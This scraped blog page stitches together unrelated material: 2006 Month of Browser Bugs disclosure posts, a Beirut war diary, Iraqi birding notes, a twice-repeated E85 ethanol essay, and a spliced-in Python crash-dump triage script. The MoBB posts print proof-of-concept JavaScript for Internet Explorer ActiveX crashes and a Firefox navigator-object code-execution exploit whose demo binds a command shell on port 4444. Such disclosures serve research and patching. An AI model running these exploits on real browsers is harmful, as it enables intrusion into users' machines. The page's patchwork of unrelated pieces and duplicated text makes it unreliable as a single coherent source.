Monday, July 31, 2006

Concluding the Month of Browser Bugs

The Month of Browser Bugs is finished! Jericho was kind enough to write up a review of the MoBB project in the OSVDB Blog. Although the MoBB project is complete, this blog will continue to be used to publish new and interesting browser hacks. Aviv Raff and Pusscat have offered to help out in the coming months by moderating comments and publishing new browser-related security findings. Thanks again to everyone who submitted comments and otherwise participated in the project.

wow. i just realized it is already august. time is flying by so slowly, but so quickly at the same time... is that possible? i have totally lost track of time. every day is simply every day now.

black dust

there is a black dust that is filling the air. we are breathing it in ... constantly. it has settled on my clothes, in my kitchen... it is everywhere. we are guessing it is from the Jiye power station that was bombed... it is still on fire... it is the power station from which the oil spill originated.

today i had my first experience at queuing for gas. the shortages have arrived. so many gas stations have shut down. the few that are left have long queues.. i waited for 40 minutes.. and when my turn came, i was given $10 worth only.

i only have a few minutes left before the electricity gets cut. we are running on generator now and they usually turn it off at midnight...

everyone is talking about the depleted uranium in the bombs... it is everywhere now. in the air we breathe.. in the land... it will soon be in our crops... in our water... wow. every time i think that things can't get worse, they do.

i am already envisioning myself with cancer. i can feel it all around me. i don't know if i could be as strong as maya has been.

maya by the way is doing ok. she is now on about 5 different pain killers... they make her funny. whenever i call she answers... "hello. maya's house of pain.. can i help you." hehe. it's funnier when you hear it on the phone.

the sky is so dark tonight. there is no moon. beirut is quiet. death is all around me.

MoBB #31: Safari KHTMLParser::popOneBlock

The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4 (PPC) system. Safari will dereference and call a pointer from the heap if a script element, inside a div element, redefines the document body. Code execution is possible, but more time is required to develop a reliable exploit. This bug was discovered by Jose Avila III and Pusscat. Strangely enough, this bug does not affect KDE's Konqueror (tested 3.5.3).

Please see the demo source code for an example.

Warning: The following link may cause your browser to crash.
Demonstration

Program received signal EXC_BAD_INSTRUCTION, Illegal instruction/operand.
(gdb) x/i $pc
0x4aeec58: .long 0x690074

#0 0x04aeec58 in ?? ()
#1 0x95c6f884 in KHTMLParser::popOneBlock ()
#2 0x95c43998 in KHTMLParser::freeBlock ()
#3 0x95cdff3c in KHTMLParser::finished ()
#4 0x95cdfe7c in khtml::HTMLTokenizer::end ()
#5 0x95c7ec8c in khtml::HTMLTokenizer::finish ()
#6 0x95d90358 in KHTMLPart::endIfNotLoading ()

0x95c6f8c4 <_ZN11KHTMLParser11popOneBlockEb+132>: lwz r2,0(r3)
0x95c6f8c8 <_ZN11KHTMLParser11popOneBlockEb+136>: lwz r12,268(r2)
0x95c6f8cc <_ZN11KHTMLParser11popOneBlockEb+140>: mtctr r12
0x95c6f8d0 <_ZN11KHTMLParser11popOneBlockEb+144>: bctrl

This bug will be added to the OSVDB:
Apple Safari KHTMLParser::popOneBlock Code Execution

Sunday, July 30, 2006

Iraq records a critically endangered bird

One of the rarest birds in the world, the Northern Bald Ibis has been satellite tracked to extreme western Iraq during its migration south from the breeding grounds of the tiny remnant population of 13 birds in Syria (discovered in 2002) to Yemen. The name of the male bird tracked through Iraq is Salam (Peace). Hopefully, this name will be prophetic for both the birds and Iraq.

The bird was recorded in Iraq on the morning of July 18th having flown 207 km from its breeding grounds in Palmyra, Syria since the day before. The bird is currently in Western Yemen along with two other tagged birds.

The fact that there are more Northern Bald Ibis in captivity than in the wild highlights their tenuous hold. Another small wild population exists in Morocco.

The bird, once found throughout Europe and the Middle East, has experienced a spectacular decline. A colony in Turkey dropped from 600-800 pairs in 1954 to 6 pairs in 1980. The last wild birds nested in 1989, when the remaining few birds were captured for a captive breeding program.

I previously had the Northern Bald Ibis listed as extirpated on the Iraqi list. I've happily changed the Bald Ibis status on the Iraqi checklist from extirpated to rare visitor. Historically there were a few colonies in Iraq. I couldn't find any references, save a map in the IUEP Action Plan for the Northern Bald Ibis.

After going undiscovered for so long in Syria, perhaps there is a chance that other relict colonies exist in Syria and maybe even remote areas of Iraq.

beirut update

dear citizens of earth,

please do not post political comments or comments of hate or blame on my blog. though i appreciate that everyone is entitled to their opinions, i do not want my blog to be a platform for political debate.

i am an artist, not a politician.

our beautiful world is in such a fragile state right now. let us rise above hate.

remember love.
remember love.



chasing oil

yesterday, a few of us got into a car and drove up the Lebanese coast line, northwards...in order to document the oil spill. we took pictures, video, and prepared a map that traced the movement of the oil slick.

though i was on the edge of having a panic attack the whole time, being afraid that at any time, the road, bridge or tunnel we were on could be bombed... it felt good to finally get out of beirut for a few hours... first time in a long time.

what we saw was horrendous. our glorious beaches... all covered in black. bays, rocks, crevices, hidden under a blanket of oil. i can not tell you how big this spill is. we went as far up as Anfe (which is about 10 minutes before Tripoli) before we had to turn back to Beirut in order to make it to our evening interviews on time. the oil slick continues to travel north, eating up everything in its path. we heard it has reached Syria now.

Byblos (Jbeil) bay is completely smothered. this once picturesque and touristic town, also the oldest port city on Earth, is in ruins. we could smell the oil before we were anywhere close to the bay. this summer, the town was planning to celebrate its 7,000th birthday! there were huge festivities planned... so much went into it... now... nothing but this black plague.

we stopped to speak with a few fishermen. they are completely devastated. they have no means of income anymore. so many of them had fixed up their boats for this summer in hopes of giving tourists small boat trips around the coast. now, that is gone too.

i had a really bad headache all day... we were driving on the coastal road, stopped every few minutes to document.... the smell was so strong. when i got home, i blew my nose and the tissue was all black. i made sure to take a really good shower.

we were going to send out the press release, pics and video today, but we got even worse news...

there had been a massacre in Qana early this morning. history repeats itself. the Israelis dropped a bomb on a building that was sheltering refugees. the news at this point is that 55 were killed. mostly women and children... but the numbers are growing. the news is still fresh. it was only a few years ago that the Israelis did the same thing, except last time, it was a UN building that they hit. and over 100 people were killed. mostly women and children killed... why?? how can anyone be so inhumane?

i think Israel is the only country in the world that is allowed to hit UN posts and get away with it. only a few days ago, a UN post was hit in the South. UN peacekeepers died. to their families, i beg forgiveness. Lebanon is a beautiful country.. full of beautiful people. we all mourn your loss.

this whole attack has been one massacre after another. and still they persist. and still, it continues...

Saturday, July 29, 2006

MoBB #30: Orphan Object Properties

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was discovered by Aviv Raff while working on a new browser fuzzing tool. It is possible to trigger a NULL dereference by accessing the property of an object that is inside a deleted frame.

Please see the demo source code for an example.

Demonstration

eax=00000000 ebx=01ba7180 ecx=00000000
edx=7dc95b90 esi=00000000 edi=00000000
eip=7dc9d8ba esp=0013dc98 ebp=0013dccc
mshtml!CMarkup::EnsureTopElems+0xc:
7dc9d8ba 8b7744 mov esi,dword ptr [edi+44h] ds:0023:00000044=????????

This bug will be added to the OSVDB:
Microsoft IE Orphan Object Property Access NULL Dereference

while i was building dreams, they were preparing my destruction

the latest in my inbox today... i have now heard from more than one source that these attacks have been planned all along.

"Of all of Israel's wars since 1948, this was the one for which Israel
was most prepared," Gerald Steinberg, a political science professor at
Israel's Bar-Ilan University, told the San Francisco Chronicle
(7/21/05). "By 2004, the military campaign scheduled to last about
three weeks that we're seeing now had already been blocked out and, in
the last year or two, it's been simulated and rehearsed across the
board." The Chronicle reported that a "senior Israeli army officer"
has been giving PowerPoint presentations for more than a year to "U.S.
and other diplomats, journalists and think tanks" outlining the coming
war with Lebanon, explaining that a combination of air and ground
forces would target Hezbollah and "transportation and communication
arteries."

http://www.fair.org/index.php?page=2928

can someone tell me why i wasn't notified? they tell the press, but they don't tell me? boy do i feel stupid.

today i feel so stupid.

for the last six years, i have been making plans. i have been building dreams. i got married. i bought a home. i painted. i exhibited. i made plans with people... for them to come here. i invested time, emotions, money, ideas, love... into lebanon.

for the last six years, i have been building bridges. from beirut to new york. from beirut to everywhere.

for the last six years, i have made new friends. i have met with people. i have made contacts. i have made commitments.

for the last six years, i promised people things. at work, at home, with friends...

for the last six years, i have been encouraging others to paint, sculpt, draw, film, photograph, make, stick, sew, create... i promised them that their work would get somewhere... that it was so important to make work... that lebanon was embracing the arts.. and we just had to direct it.

for the last six years, i promised my parents a family. i promised them grandchildren.

for the last six years, i promised my best friends a beirut that our kids would love. a beirut that would be healthy for ourselves and our friends. a beirut that would be unlike any other city in the world.

i just wish i got to see the power point presentation.. then i wouldn't have wasted my time on so much hope. while i was building dreams... they were preparing my destruction. why???????????

yes, dear reader, i am becoming angry and cynical. this is what happens when you stop sleeping. this is what happens when you stop eating. this is what happens when your dreams are shattered. this is what happens when your country is violated.

but, i will not hate. i will never hate. i am just really really disappointed by these people who feel they have the right to govern my life.

only thing left to do now is to resist. resist with love. my most powerful weapon that no one can touch.

i still love. i will always love. i love beirut.

MoBB #29: ADODB.Recordset NextRecordset

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the NextRecordset method repeatedly with a long string can result in an invalid memory access inside the SysFreeString function. This bug is similar to MoBB #8 and MoBB #21.

var a = new ActiveXObject('ADODB.Recordset');
var b = 'XXXX';
while (b.length <= 1024*512) b+=b;
for (var i = 0; i < 32768; i++) try { a.NextRecordset(b); } catch(e) {}

Demonstration

eax=00181358 ebx=0013b1c4 ecx=00000007
edx=0000400c esi=02d30020 edi=00000008
eip=77124874 esp=0013ae68 ebp=0013ae6c
OLEAUT32!SysFreeString+0x45:
77124874 8b0e mov ecx,[esi] ds:0023:02d30020=???

This bug will be added to the OSVDB:
Microsoft IE ADODB.Recordset SysFreeString Invalid Length

Friday, July 28, 2006

tax dollars

it's almost 5 am and i can't sleep. that noisy propeller sounding plane is flying over my house again. i think it's a spy plane. the noise is pretty constant. as if it is hovering just above my roof.

we heard today that Israeli troops are pulling out a little in the South. Does this mean that their new shipment of bombs has arrived? the expedited delivery from America? they don't have to sacrifice soldiers on the ground anymore... now they can just blow us up from the skies.

here we go, ladies and gentlemen, a new round of bombings... what is there left to bomb anyway? the South of Lebanon is on fire. Saida is on fire. Beirut is on fire. i can't keep track of things.

biggest joke of the week: Condi went to Rome to try and make peace, but in the meantime America is sending Israel new bombs.

can someone tell me what they were thinking?

and worst news of all... with all this attention on Lebanon, the world is not paying attention to the new attacks on Gaza. for the last 2 days there has been constant shelling on Gaza. the sick joke here is that the Israelis were upset about having to pull out of the South, so they are taking it out on the Palestinians now.

when will we all learn that violence begets violence.

my dear american friends, your tax dollars are really starting to annoy me. no matter how much you protest the idea, you are all involved in this as much as i am. i know so many of you are protesting this, but it seems like your congress is not. if you really want to help me here, please speak to your congress. ask them to stop this madness.

thank you


so, i have not been able to draw or paint since the attacks started, but a dear friend and wonderful artist, Emily Jacir, saw to it that somehow, art could be made out of all of this.

Emily who is currently in NYC asked some of her students to make street art/ community activism art out of some of her emails, she printed out for them, from the last two weeks. she asked them to "go out into the streets and do something in the public sphere based on their interaction, (or reaction) or whatever with the emails." a few students got some of my emails..and have been able to make the art i haven't been able to make.

thank you, Emily. and thank your students.

the media can say all they want, but art always tells the truth.

you can read more about this on electronic intifada:
http://electronicintifada.net/v2/article5301.shtml

the pic above was taken by Emily.




a crab eulogy

by the way, we tried to wash the crab. tried to save it. but the oil wouldn't come off. it was so thick. we had to leave him on the beach. i want to take this moment to mourn all our sea life and animals that succumbed or will succumb to this senseless and unjust war. i apologize on behalf of mankind who can be really stupid sometimes. we invade your space, your habitats... we impose our way of life on you... we drag you into our mess... for this, i am so sorry. dearest Mother Nature, i hope you can find a way to forgive us. we still have so much to learn.

Thursday, July 27, 2006

MoBB #28: Mozilla Navigator Object

The following bug (mfsa2006-45) was tested on Firefox 1.5.0.4 running on Windows 2000 SP4, Windows XP SP2, and a recently updated Gentoo Linux system. This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is trivial to turn into a working exploit. The demonstration link below will attempt to launch "calc.exe" on Windows systems, execute "touch /tmp/METASPLOIT" on Linux systems, and bind a command shell to port 4444 for Mac OS X Intel and PowerPC systems (thanks Todd and nemo!).

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

Demonstration

This bug has been added to the OSVDB:
Mozilla Multiple Product Window Navigator Object Arbitrary Code Execution

Good News for the Endangered Basra Reed Warbler

Birdlife International has announced the discovery of breeding Basrah Reed Warblers far out of the known breeding areas of Iraq and Iran. 4 birds including a recently fledged juvenile were found in Israel's Hula Valley in June 2006. A newly discovered disjunct population would be great news for this IUCN Red-listed species. The revegetation of the southern marshes of Iraq also bodes well for this small songbird whose population may have dropped up to 80% since the early 1970's. In Iraq the bird has been found in reed-filled marshes and riverbanks from Baghdad to the Shatt Al-Arab marshes in the south. In 1981 a survey reported breeding birds in the Jadriyah section of Baghdad right across the river from the Green Zone. The birds might survive in small patches in greater Baghdad, though the original site now has been significantly degraded. The stronghold remains the lower Mesopotamian marshes.

MoBB #27: NDFXArtEffects RGBExtraColor

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. A stack overflow can occur by setting one of the RGBExtraColor, RGBForeColor, and RGBBackColor properties to a long string value. Since the entire string is placed into a stack buffer, you are able to select exactly what instruction to fault on based on the length of the string. Does anyone know of a way to exploit this for something besides a crash?

var b = 'XXXX';
while(b.length <=1024*1024) b+=b;
var a = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');
var i = 1016320;
a.RGBExtraColor = b.substring(0,i);

Demonstration

eax=4db88a05 ebx=000f8201 ecx=7c809f8a
edx=0013b274 esi=02f50024 edi=00000000
eip=4db88a11 esp=00043000 ebp=0013b254
wmm2fxb!DXColorFromBSTR+0xc8:
4db88a11 57 push edi

This bug will be added to the OSVDB:
Microsoft IE NDFXArtEffects Multiple Property Stack Overflow
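
A way to read the three Windows register dumps in MoBB #30, #29 and #27 when triaging crash reports, as an added example that is not part of the original posts: the script parses each dump and labels the fault as a near-NULL dereference, an access to an unmapped address, or stack exhaustion. The function name `triage`, the class labels and the 64 KB and page-boundary heuristics are assumptions of this example.

```python
import re

# Debugger output copied verbatim from the MoBB #30, #29 and #27 posts.
DUMPS = {
    "MoBB #30": """\
eax=00000000 ebx=01ba7180 ecx=00000000
edx=7dc95b90 esi=00000000 edi=00000000
eip=7dc9d8ba esp=0013dc98 ebp=0013dccc
mshtml!CMarkup::EnsureTopElems+0xc:
7dc9d8ba 8b7744 mov esi,dword ptr [edi+44h] ds:0023:00000044=????????
""",
    "MoBB #29": """\
eax=00181358 ebx=0013b1c4 ecx=00000007
edx=0000400c esi=02d30020 edi=00000008
eip=77124874 esp=0013ae68 ebp=0013ae6c
OLEAUT32!SysFreeString+0x45:
77124874 8b0e mov ecx,[esi] ds:0023:02d30020=???
""",
    "MoBB #27": """\
eax=4db88a05 ebx=000f8201 ecx=7c809f8a
edx=0013b274 esi=02f50024 edi=00000000
eip=4db88a11 esp=00043000 ebp=0013b254
wmm2fxb!DXColorFromBSTR+0xc8:
4db88a11 57 push edi
""",
}

REG_RE = re.compile(r"\b(e[a-z]{2})=([0-9a-f]{8})\b")
SYM_RE = re.compile(r"^(\S+!\S+):[ \t]*$", re.M)
# address, opcode bytes, mnemonic, operands
INSN_RE = re.compile(
    r"^([0-9a-f]{8})[ \t]+([0-9a-f]+)[ \t]+(\w+)[ \t]*(.*)$", re.M)
# "ds:0023:00000044=????????": the debugger prints '?' when the
# memory operand cannot be read.
MEM_RE = re.compile(r"\b[a-z]s:[0-9a-f]{4}:([0-9a-f]{8})=(\?+)")
BASE_RE = re.compile(r"\[(e[a-z]{2})")

# Assumption: the lowest 64 KB of a 32-bit Windows user process is
# never mapped, so a fault there is a NULL pointer plus a field offset.
NULL_PAGE_LIMIT = 0x10000
PAGE_MASK = 0xFFF


def triage(dump: str) -> dict:
    """Classify one register dump by the kind of fault it shows."""
    regs = {name: int(val, 16) for name, val in REG_RE.findall(dump)}
    sym = SYM_RE.search(dump)
    insn = INSN_RE.search(dump)
    if insn is None or "eip" not in regs:
        raise ValueError("not a register dump with a faulting instruction")
    addr, _opcode, mnemonic, operands = insn.groups()
    result = {
        "symbol": sym.group(1) if sym else None,
        # Sanity check: the disassembled line is the one eip points at.
        "eip_matches": int(addr, 16) == regs["eip"],
        "insn": f"{mnemonic} {operands}".strip(),
    }
    mem = MEM_RE.search(operands)
    if mem:
        target = int(mem.group(1), 16)
        # Memory operand first means it is the destination (a write).
        first_operand = operands.split(",")[0]
        result["access"] = "write" if "[" in first_operand else "read"
        result["target"] = target
        base = BASE_RE.search(operands)
        result["base_reg"] = base.group(1) if base else None
        if target < NULL_PAGE_LIMIT:
            result["class"] = "near-null-dereference"
        else:
            result["class"] = "unmapped-address-access"
    elif mnemonic in ("push", "call") and (regs.get("esp", 1) & PAGE_MASK) == 0:
        # Heuristic: a push at a page-aligned esp writes into the page
        # below, which faults once the stack has grown to its limit.
        result["class"] = "stack-exhaustion"
        result["frame_span"] = regs["ebp"] - regs["esp"]
    else:
        result["class"] = "unclassified"
    return result


if __name__ == "__main__":
    for name, dump in DUMPS.items():
        r = triage(dump)
        extra = ""
        if "target" in r:
            extra = f" {r['access']} of 0x{r['target']:08x} via {r['base_reg']}"
        elif "frame_span" in r:
            extra = f" ebp-esp = {r['frame_span']} bytes"
        print(f"{name}: {r['class']} in {r['symbol']}{extra}")
```

For the MoBB #27 dump the reported distance between ebp and esp is 1,016,404 bytes, within 84 bytes of the 1,016,320-character string the post assigns to RGBExtraColor.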

Wednesday, July 26, 2006

Is Ethanol / E85 Fuel the Solution?



I've recently received a number of emails calling for me to Kick the Oil Habit by supporting E85 which is a liquid fuel made up of 85% ethanol and 15% regular gasoline. Having previously had my doubts about ethanol I emailed fellow blogger the Engineer Poet seeking his opinion. A large part of this resulting post is based directly on his reply and as such the credit belongs to him.

So is E85 fuel the answer to America's (and the world's) addiction to oil?

E85 fuel is not the solution. It is not even a part of the solution, it is a part of the problem. Here's why, in a nutshell:

All US vehicles can burn 10% ethanol (E10), but the US does not even produce half as much ethanol as universal E10 would require. We make about 5 billion gallons of ethanol, but use 140 billion gallons of gas.

E85 and "flex fuel" is a loophole for the automakers to sell guzzlers without having to pay CAFE penalties. It makes the problem worse. Ending the loophole probably means ending E85, because there is no other reason for it to exist.

Since the best estimate is that every gallon-equivalent of ethanol takes about 4/5 of a gallon-equivalent of other fossil fuel to make it, each gallon of E85 really represents about 0.6 gallons-equivalent of various fossil fuels. Since most flex-fuel vehicles get roughly 2/3 the mileage on E85 as they do on gasoline, they burn about 90% as much fossil energy even at their best.

Even if we can use "cellulosic ethanol" to reduce the inputs of fossil-derived fertilizer and whatnot, we can't make enough no matter what we do. The efficiency of the average gasoline-powered vehicle is about 15%, and we just can't grow enough inputs to make up for throwing 85% of our produced energy away. The most efficient use of biomass is in local combined heat and power plants, not as a feedstock for ethanol.

Low corn prices and high oil prices, and a government subsidy of 51 cents per gallon have fuelled unprecedented growth of the ethanol industry. In the case of the U.S. ethanol industry, fossil fueled trucks ship the fuel halfway across the country from the population sparse corn belt to population and car dense states like California and Texas. Science magazine found only a 13% reduction in CO2 emissions for bioethanol over gasoline (and only 11% for E85 fuel). U.S. government federal records show a single ADM corn processing plant in Clinton, Iowa generated nearly 20,000 tons of pollutants including sulfur dioxide, nitrogen oxides, and volatile organic compounds in 2004. The EPA considers an ethanol plant as a "major source" of pollution if it produces more than 100 tons of any one pollutant per year. From an emissions standpoint it is far preferable to drive a fuel efficient gasoline car than a low efficiency flex fuel vehicle running on E85.

E85 fuel is not a solution. It is a distraction, like hydrogen vehicles. Further, every E85 vehicle is also a gasoline-compatible vehicle. It will maintain demand for petroleum as long as it is on the road. If you want to end oil addiction you have to get rid of the things which use it.

E85 ethanol fuel may make a small contribution now, but it is a dead end. If we want to really be free of fossil fuels (including imported oil), we have to re-think things as completely as changing from riding horses to driving motor cars.

Ethanol has already created an addiction of its own. The farmers and agribusiness interests which got into it found it hugely profitable, and they have big investments in its continuation. Even if you developed a better way of using corn today, you'd still have a lot of money lobbying to use it for ethanol, and even force it to be used for ethanol.



This is already a race between technologies which can make us independent of fossil fuel, and technologies which get subsidy money. In that race, the subsidy seems to win every time. At least 43 percent of Archer Daniels Midland's annual profits are from products heavily subsidized or protected by the American government. For every $1 of profit earned by ADM's ethanol operation (the largest in the U.S.), it costs taxpayers $30. If you subsidize a technology which can only replace half our gasoline (and none of our diesel, jet fuel, or anything else), you're probably going to be stuck with it.

A hobbyist wrote an article about his home-built plug-in hybrid electric vehicle (PHEV). He published this article in Mother Earth News... in 1978.

We don't need any new technology. We could be building these cars today. Heck, we could have been building them in 1995 (when the CARB ZEV mandate came in)... or maybe even 1985. They would have been crude, but they would have gotten the job done. We can do far better today, of course.

People finally got fed up and started building their own PHEV's out of Toyota Priuses. It's time to quit the excuses, both making them and accepting them.

CAFE regulations utterly failed to contain U.S. motor-fuel consumption. This is not opinion, this is historical fact. Now the E85 fuel campaign wants to do the same thing again, but "reduce" consumption with E85 instead of directly cutting gallons-per-mile. You'll get the same result as before - if driving doesn't cost more, people will continue to drive as much or more.

There are roughly 200 million light-duty vehicles in the USA. One recent news item says that there will be all of 6 million flex-fuel vehicles by 2007. That's a whole 3%.

The average flex-fuel vehicle is a guzzling truck (because they get the biggest CAFE preference from it). If those trucks get 13 MPG on E85, and they drive the national average of 13,000 miles/year, those 6 million vehicles would consume 5.1 billion gallons of ethanol. That's roughly the same as the total production capacity of the nation.

The E85 fuel campaign is currently sponsoring a road trip to highlight the usage of E85, but also the difficulty of driving a car solely on E85 due to its lack of availability.


the electric Tesla Roadster - 250 mile range, one cent a mile, 0-60 in 4 seconds, 130 mph top speed - photo from Autoblog Green

However, had this trip been made in a Tesla Roadster or tZero from AC Propulsion, it could have instead highlighted how EASY it is to get electricity wherever you are... even if you never stop at a filling station! Using non-toxic lithium-ion batteries they have a 250 mile range, charging overnight from an electric outlet.

E85 fuel is a distraction, a diversion, a red herring. Just as the switch to "hydrogen economy" (remember that?) was before it. Both require huge investment, new infrastructure and will not lead to a post-oil economy. The hydrogen economy was promoted principally by both automakers and oil companies as a stalling strategy to avoid having to change the way they currently do business. Oil companies were also aware in the unlikely event that the hydrogen economy did take off (with huge taxpayer subsidies) that they would be supplying hydrogen produced from natural gas which they were already profiting from. The automakers sat around lamenting the fact they couldn’t start to build cars as there are hardly any hydrogen filling stations and the energy companies would not open commercial hydrogen filling stations as there is no demand for them. While appearing to want to do something, both the automakers and energy companies continued for a few more years with business as usual.


The Nissan Armada promoted on the E85 fuel site - with no fuel economy figures indicated

The campaign for E85 fuel is somewhat similar. The automakers are eager to produce flex fuel vehicles which require a relatively cheap modification to the highly profitable gas guzzling SUVs they already produce. By backing E85 fuel they can continue to produce the highly inefficient vehicles while appearing to be green (as seen in GM's Live Green Go Yellow campaign). Car and Driver magazine estimates the CAFE loophole could have saved GM more than $200 million in fines in 2005 alone.

As GM admits the consumer can choose “to operate on gasoline or on a blend of 85% ethanol and 15% gasoline. So, you can choose the fuel that's best for you. That's good to know, because E85 fuel is not yet widely available.” In other words in the vast majority of cases your new flex fuel vehicle will still be running on regular gas. Charter members of the National Ethanol Vehicle Coalition (NEVC), which promotes E85 fuel, when it was set up in June 2000 include GM, DaimlerChrysler, and Ford.

Meanwhile E85 fuel is also being promoted by organisations such as the National Corn Growers Association, as well as regional and state corn growers organisations, associated agribusinesses and biofuel companies. All of which have a commercial interest in promoting E85 fuel. According to the Center for Responsive Politics, a clearinghouse on political donations, the agribusiness sector has funneled more than $190 million into federal election campaigns since the 2000 election cycle. In the NEVC’s bylaws its purpose is described as to "ensure that as decisions regarding the future of America’s use of alternative forms of transportation fuels are being made, ethanol has a role in the nation’s alternative transportation fuel market and support the expanded use of ethanol" and to "advance legislative proposals" to this effect. This seems to be regardless of whether ethanol/ E85 fuel is the best or is even a good solution to our energy challenges.

As the Engineer Poet points out in this post, burning fuel for transportation is a very inefficient way of using energy. Whether you are fed up with the current use of petroleum for transportation for environmental, political or financial reasons E85 fuel is simply not the answer. What we need is a step change, as represented by moving from using gas burning vehicles to electric vehicles.

To encourage this, I urge you to sign this online plug in hybrid campaign asking automakers to produce plug-in hybrid electric vehicles (PHEVs).

Autoblog Green's exclusive interview with Tesla Motors' chairman

Tesla Roadster Video

Archer Daniels Midland (ADM) - the Largest U.S. Ethanol Producer

Vinod Khosla Debunked

Car and Driver Magazine on the Promise of Energy Independence through Ethanol

USA Today on the Ethanol Debate

Cutting Down Borneo's Rainforests to Make BioFuels

Is Ethanol / E85 Fuel the Solution?



I've recently received a number of emails calling for me to Kick the Oil Habit by supporting E85 which is a liquid fuel made up of 85% ethanol and 15% regular gasoline. Having previously had my doubts about ethanol I emailed fellow blogger the Engineer Poet seeking his opinion. A large part of this resulting post is based directly on his reply and as such the credit belongs to him.

So is E85 fuel the answer to America's (and the world's) addiction to oil?

E85 fuel is not the solution. It is not even a part of the solution, it is a part of the problem. Here's why, in a nutshell:

All US vehicles can burn 10% ethanol (E10), but the US does not even produce half as much ethanol as universal E10 would require. We make about 5 billion gallons of ethanol, but use 140 billion gallons of gas.

E85 and "flex fuel" is a loophole for the automakers to sell guzzlers without having to pay CAFE penalties. It makes the problem worse. Ending the loophole probably means ending E85, because there is no other reason for it to exist.

Since the best estimate is that every gallon-equivalent of ethanol takes about 4/5 of a gallon-equivalent of other fossil fuel to make it, each gallon of E85 really represents about 0.6 gallons-equivalent of various fossil fuels. Since most flex-fuel vehicles get roughly 2/3 the mileage on E85 as they do on gasoline, they burn about 90% as much fossil energy even at their best.

Even if we can use "cellulosic ethanol" to reduce the inputs of fossil-derived fertilizer and whatnot, we can't make enough no matter what we do. The efficiency of the average gasoline-powered vehicle is about 15%, and we just can't grow enough inputs to make up for throwing 85% of our produced energy away. The most efficient use of biomass is in local combined heat and power plants, not as a feedstock for ethanol.

Low corn prices and high oil prices, and a government subsidy of 51 cents per gallon have fuelled unprecedented growth of the ethanol industry. In the case of the U.S. ethanol industry, fossil fueled trucks ship the fuel halfway across the country from the population sparse corn belt to population and car dense states like California and Texas. Science magazine found only a 13% reduction in CO2 emissions for bioethanol over gasoline (and only 11% for E85 fuel). U.S. government federal records show a single ADM corn processing plant in Clinton, Iowa generated nearly 20,000 tons of pollutants including sulfur dioxide, nitrogen oxides, and volatile organic compounds in 2004. The EPA considers an ethanol plant as a "major source" of pollution if it produces more than 100 tons of any one pollutant per year. From an emissions standpoint it is far preferable to drive a fuel efficient gasoline car than a low efficiency flex fuel vehicle running on E85.

E85 fuel is not a solution. It is a distraction, like hydrogen vehicles. Further, every E85 vehicle is also a gasoline-compatible vehicle. It will maintain demand for petroleum as long as it is on the road. If you want to end oil addiction you have to get rid of the things which use it.

E85 ethanol fuel may make a small contribution now, but it is a dead end. If we want to really be free of fossil fuels (including imported oil), we have to re-think things as completely as changing from riding horses to driving motor cars.

Ethanol has already created an addiction of its own. The farmers and agribusiness interests which got into it found it hugely profitable, and they have big investments in its continuation. Even if you developed a better way of using corn today, you'd still have a lot of money lobbying to use it for ethanol, and even force it to be used for ethanol.



This is already a race between technologies which can make us independent of fossil fuel, and technologies which get subsidy money. In that race, the subsidy seems to win every time. At least 43 percent of Archer Daniels Midland's annual profits are from products heavily subsidized or protected by the American government. For every $1 of profit earned by ADM's ethanol operation (the largest in the U.S.), it costs taxpayers $30. If you subsidize a technology which can only replace half our gasoline (and none of our diesel, jet fuel, or anything else), you're probably going to be stuck with it.

A hobbyist wrote an article about his home-built plug-in hybrid electric vehicle (PHEV). He published this article in Mother Earth News... in 1978.

We don't need any new technology. We could be building these cars today. Heck, we could have been building them in 1995 (when the CARB ZEV mandate came in)... or maybe even 1985. They would have been crude, but they would have gotten the job done. We can do far better today, of course.

People finally got fed up and started building their own PHEVs out of Toyota Priuses. It's time to quit the excuses, both making them and accepting them.

CAFE regulations utterly failed to contain U.S. motor-fuel consumption. This is not opinion, this is historical fact. Now the E85 fuel campaign wants to do the same thing again, but "reduce" consumption with E85 instead of directly cutting gallons-per-mile. You'll get the same result as before - if driving doesn't cost more, people will continue to drive as much or more.

There are roughly 200 million light-duty vehicles in the USA. One recent news item says that there will be all of 6 million flex-fuel vehicles by 2007. That's a whole 3%.

The average flex-fuel vehicle is a guzzling truck (because they get the biggest CAFE preference from it). If those trucks get 13 MPG on E85, and they drive the national average of 13,000 miles/year, those 6 million vehicles would consume 5.1 billion gallons of ethanol. That's roughly the same as the total production capacity of the nation.

The E85 fuel campaign is currently sponsoring a road trip to highlight the usage of E85, but also the difficulty of driving a car solely on E85 due to its lack of availability.


the electric Tesla Roadster - 250 mile range, one cent a mile, 0-60 in 4 seconds, 130 mph top speed - photo from Autoblog Green

However, had this trip been made in a Tesla Roadster or tZero from AC Propulsion, it could have instead highlighted how EASY it is to get electricity wherever you are... even if you never stop at a filling station! Using non-toxic lithium-ion batteries they have a 250 mile range, charging overnight from an electric outlet.

E85 fuel is a distraction, a diversion, a red herring, just as the switch to a "hydrogen economy" (remember that?) was before it. Both require huge investment and new infrastructure, and neither will lead to a post-oil economy. The hydrogen economy was promoted principally by both automakers and oil companies as a stalling strategy to avoid having to change the way they currently do business. Oil companies were also aware that, in the unlikely event that the hydrogen economy did take off (with huge taxpayer subsidies), they would be supplying hydrogen produced from natural gas, which they were already profiting from. The automakers sat around lamenting the fact that they couldn’t start to build cars because there were hardly any hydrogen filling stations, and the energy companies would not open commercial hydrogen filling stations because there was no demand for them. While appearing to want to do something, both the automakers and energy companies continued for a few more years with business as usual.


The Nissan Armada promoted on the E85 fuel site - with no fuel economy figures indicated

The campaign for E85 fuel is somewhat similar. The automakers are eager to produce flex fuel vehicles which require a relatively cheap modification to the highly profitable gas guzzling SUVs they already produce. By backing E85 fuel they can continue to produce the highly inefficient vehicles while appearing to be green (as seen in GM's Live Green Go Yellow campaign). Car and Driver magazine estimates the CAFE loophole could have saved GM more than $200 million in fines in 2005 alone.

